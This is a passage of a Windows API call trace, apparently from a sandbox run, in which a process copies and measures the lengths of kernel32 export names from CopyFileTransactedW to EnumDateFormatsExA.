lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0082.776] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0082.776] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0082.776] lstrlenA (lpString="COPYFILEW") returned 9 [0082.776] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0082.776] lstrlenA (lpString="COPYLZFILE") returned 10 [0082.776] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0082.776] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0082.777] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0082.777] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0082.777] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0082.777] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0082.777] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0082.777] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0082.777] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0082.777] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0082.777] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0082.777] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0082.777] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0082.777] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0082.777] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0082.777] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0082.777] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0082.777] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0082.777] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0082.777] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0082.777] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0082.777] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0082.777] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0082.777] lstrlenA (lpString="CREATEEVENTA") returned 12 [0082.777] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0082.777] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0082.777] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0082.777] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0082.777] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0082.777] lstrlenA (lpString="CREATEEVENTW") returned 12 [0082.777] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0082.777] lstrlenA (lpString="CREATEFIBER") returned 11 [0082.777] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0082.777] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0082.777] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0082.777] lstrlenA (lpString="CREATEFILEA") returned 11 [0082.777] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0082.778] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0082.778] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0082.778] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0082.778] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0082.778] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0082.778] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0082.778] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0082.778] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0082.778] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0082.778] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0082.778] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0082.778] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0082.778] lstrlenA (lpString="CREATEFILEW") returned 11 [0082.778] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0082.778] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0082.778] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0082.778] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0082.778] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0082.778] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0082.778] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0082.778] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0082.778] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0082.778] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0082.778] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0082.778] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0082.778] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0082.778] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0082.778] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0082.778] lstrlenA (lpString="CREATEJOBSET") returned 12 [0082.778] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0082.778] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0082.778] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0082.778] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0082.778] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0082.778] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0082.778] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0082.778] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0082.779] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0082.779] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0082.779] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0082.779] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0082.779] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0082.779] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0082.779] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0082.779] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0082.779] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0082.779] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0082.779] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0082.779] lstrlenA (lpString="CREATEPIPE") returned 10 [0082.779] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0082.779] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0082.779] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0082.779] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0082.779] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0082.779] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0082.779] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0082.779] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0082.779] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0082.779] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0082.779] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0082.779] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0082.779] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0082.779] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0082.779] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0082.779] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0082.779] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0082.779] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0082.779] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0082.779] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0082.779] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0082.779] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0082.779] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0082.779] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0082.779] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0082.780] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0082.780] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0082.780] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0082.780] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0082.780] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0082.780] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0082.780] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0082.780] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0082.780] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0082.780] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0082.780] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0082.780] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0082.780] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0082.780] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0082.780] lstrlenA (lpString="CREATETHREAD") returned 12 [0082.780] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0082.780] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0082.780] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0082.780] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0082.780] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0082.780] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0082.780] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0082.780] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0082.780] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0082.780] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0082.780] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0082.780] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0082.780] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0082.780] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0082.780] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0082.780] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0082.780] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0082.780] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0082.780] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0082.780] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0082.780] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0082.780] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0082.781] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0082.781] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0082.781] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0082.781] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0082.781] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0082.781] lstrlenA (lpString="CTRLROUTINE") returned 11 [0082.781] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0082.781] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0082.781] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0082.781] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0082.781] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0082.781] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0082.781] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0082.781] lstrlenA (lpString="DEBUGBREAK") returned 10 [0082.781] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0082.781] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0082.781] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0082.781] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0082.781] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0082.781] lstrlenA (lpString="DECODEPOINTER") returned 13 [0082.781] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0082.781] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0082.781] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0082.781] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0082.781] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0082.781] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0082.781] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0082.781] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0082.781] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0082.781] lstrlenA (lpString="DELETEATOM") returned 10 [0082.781] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0082.781] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0082.781] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0082.781] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0082.781] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0082.781] lstrlenA (lpString="DELETEFIBER") returned 11 [0082.781] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0082.782] lstrlenA (lpString="DELETEFILEA") returned 11 [0082.782] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0082.782] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0082.782] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0082.782] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0082.782] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0082.782] lstrlenA (lpString="DELETEFILEW") returned 11 [0082.782] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0082.782] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0082.782] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0082.782] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0082.782] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0082.782] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0082.782] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0082.782] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0082.782] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0082.782] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0082.782] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0082.782] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0082.782] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0082.782] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0082.782] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0082.782] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0082.782] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0082.782] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0082.782] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0082.782] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0082.782] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0082.782] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0082.782] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0082.782] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0082.782] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0082.782] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0082.782] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0082.782] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0082.782] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0082.782] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0082.783] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0082.783] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0082.783] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0082.783] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0082.783] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0082.783] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0082.783] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0082.783] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0082.783] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0082.783] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0082.783] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0082.783] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0082.783] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0082.783] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0082.783] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0082.783] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0082.783] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0082.783] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0082.783] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0082.783] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0082.783] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0082.783] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0082.783] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0082.783] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0082.783] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0082.783] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0082.783] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0082.783] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0082.783] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0082.783] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0082.783] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0082.783] lstrlenA (lpString="ENUMDATEFORMATSEXA") 